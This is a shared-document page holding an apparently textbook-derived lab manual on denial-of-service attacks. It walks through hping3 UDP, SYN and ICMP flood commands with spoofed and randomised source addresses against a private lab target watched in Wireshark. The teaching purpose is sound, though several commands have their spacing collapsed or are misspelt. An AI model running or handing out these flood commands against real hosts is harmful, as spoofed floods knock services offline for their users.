计算机网络安全技术(第7版)(微课版) 实验手册---拒绝服务攻击实例.pdf

计算机网络安全技术(第7版)(微课版) 实验手册---拒绝服务攻击实例.pdf

  1. 1、本文档共8页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多

拒绝服务攻击实例--

Hping3udpflood攻击实验分析

基础知识介绍

UDPFlooding攻击也是基于传输层的UDP协议来实现的,但与TCP协议不同的是,UDP协

议是面向无连接的,即客户端和服务端之间直接进行通信,无需建立连接。因此恶意攻击者

利用UDP协议面向无连接的特点,发送大量恶意的UDP数据包攻击目标网络带宽,造成网

络拥堵,并且基于UDP协议的应用层协议的种类也非常多,对于UDPFlooding攻击的防御

也相对比较困难。

实验环境准备

准备两台linux系统,其中一台kali作为攻击机,另一台安装wireshark作为靶机,靶机IP

地址192.168.188.130,攻击机IP地址为192.168.188.128,可ping通

实验:

1、我们首先登陆到kali系统中,用户名为admin123,密码为root。

2、我们接下来在攻击机kali桌面的左上角找到终端图标,打开kali终端,并输入查询ip的

命令“ifconfig”。

可知我们进行实验的攻击机ip为192.168.188.128.

随后我们打开靶机kali的系统,同上步操作一样,查询靶机ip。

我们得知靶机ip为192.168.188.130.

我们得到基础的ip信息后,接下来在靶机上打开wireshark程序,进行流量监控。打开

方式如下图。

3、随后选择eth0进入wireshark。

4、随后在攻击机打开终端,输入以下命令

(sudo)hping3-q-n-a1.11.2.1--udp-s10086-p10085--flood192.168.188.130-d

1000

Sudo:如果后面命令执行时没有root权限,则在前面加上sudo

Hping3:为该实验工具启示命令

-q:静默模式

-n:数值化的输出

-a:伪造源ip

--udp:udp

-s:源端口

-p:目标端口

--flood:攻击类型为flood攻击

192.168.188.130:靶机ip

-d:包大小

执行上述命令后,攻击机就开始向靶机进行udpflood攻击了

^+C结束

5、随后在靶机wireshark上面进行流量观察。

发现收到了大量1.11.2.1打过来的udp的包,故证明实验成功。

命令:

hping3-q-n-a伪造源IP地址-S-s伪造源端口号--keep-p被攻击机目标端口号--

flood被攻击机IP地址

随机源地址

hping3-q-n--rand-source--udp-s10086-p10085--flood10.1.1.30-d100

hping3-q-n-a10.2.2.3--udp-s10086-p10085--flood10.1.1.30-d100

hping3-q-n--rand-source--id0--icmp--flood10.1.1.30-d56

--rand-source表示伪造随机的源地址;--id0表示有ICMP应答请求(就是我们平时

执行ping命令时的数据包);-d56表示数据包的大小(56是执行ping命令时数据包的

大小);--flood表示尽可能快地发送数据包。

ping3-q-n--rand-source–S-s10086-p10085--flood10.1.1.30-d100

ping3-q-n--rand-source-s10086-p10085--flood10.1.1.30-d100

您可能关注的文档

文档评论(0)

xiaobao + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档